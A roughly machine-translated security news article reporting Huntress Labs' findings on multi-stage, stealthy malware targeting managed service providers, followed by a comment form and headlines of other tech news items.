Wednesday, October 21, 03:00
Home security Hackers spread malware to managed service providers

Hackers spread malware to managed service providers

Hackers are spreading complex malware to managed service providers (MSPs) by developing multiple and sophisticated stealth techniques to avoid detection, Huntress Labs said in an updated blog post.

MSPs are particularly attractive targets for hackers because they typically work with multiple clients, so one piece of malware can scan many potential victims at a time. Huntress, which provides tracking and response management (MDR) services through MSP, has for the first time revealed procedures of Malware on a Blog Posted Last June. Subsequent blogs have focused on how malware covers them actions of.

hackers malware

At first glance, the malware looked like a log file for an application - so it hid it activity - but looking closely we found that the file "relates to a malicious base we discovered," Huntress co-founder John Ferrell said in the original post. "Malware writers used different things tricks to hide, including renaming legal files, of disguise as existing programmed work and the use of malicious payload stored in a file that has been created to look like an error log. ”

A closer look

The error, as John Hammond, a senior Huntress security researcher, said in the updated blog, is a "multi-stager, multi-payload." While malware payloads that are delivered gradually is not uncommon, the level that reaches this malware to prevent its detection is unique. It is also smart enough to be able to go unnoticed by a standard program antivirus or endpoint, he said.

An initial payload is delivered using genuine "Windows binaries" to extract and execute a new PowerShell code containing another piece of concealed and encrypted data for recovery a second payload using Google DNS over the HTTPS service. "Using DNS over HTTP as a means of receiving another malware payload is a very clever trick," said Hammond. To deliver the final payload, the malware code reaches one external server which installs the final command and control strain to give the hacker control of the target systemic.


Please enter your comment!
Please enter your name here

Teo Ehc
Teo Ehc
Be the limited edition.


Google removes two ad blockers that collect user data

Google removed two ad blocker extensions from the official Chrome Web Store over the weekend after realizing that they were stealing ...

Two out of five employees are not sure what phishing is

The COVID-19 pandemic posed a significant challenge for businesses around the world, as the dispersed workforce seems to be ...

Hackers disguise themselves as McAfee staff and deceive users

According to Google, hackers backed by the Chinese government were disguised as McAfee employees to trick users into ...

How to find products sold by Amazon itself

Amazon acts as an intermediary in the sale of millions of goods by thousands of sellers around the world. The quality of these products varies ....

How to stop the automatic switching of AirPods between iPhone and iPad

AirPods and AirPods Pro automatically switch between iPhone and iPad. If you turn off the iPad and start a call on your iPhone, ...

The Windows 10 KB4579311 update has an installation problem

Windows 10 users face many problems when installing the latest cumulative update KB4579311 and those who can ...

The big "Twitter hack" was the result of employee fraud

The biggest Twitter hack that has become known to date, was the one that took place last July and resulted in ...

Gang ransomware donates part of ransom to charities

The Darkside ransomware gang has donated 10 thousand dollars from the ransom it has collected from its victims to Children International ...

FinCEN fines $ 60 million companies for bitcoin money laundering

The US Treasury Department's Financial Crimes Enforcement Network (FinCEN) today announced the first sentence against cryptocurrency services, Helix and ...

US: accuse Russians of global attacks

Six Russian agents have been indicted by the US Department of Justice for attacks related to the Winter Olympics in Pyeongchang, ...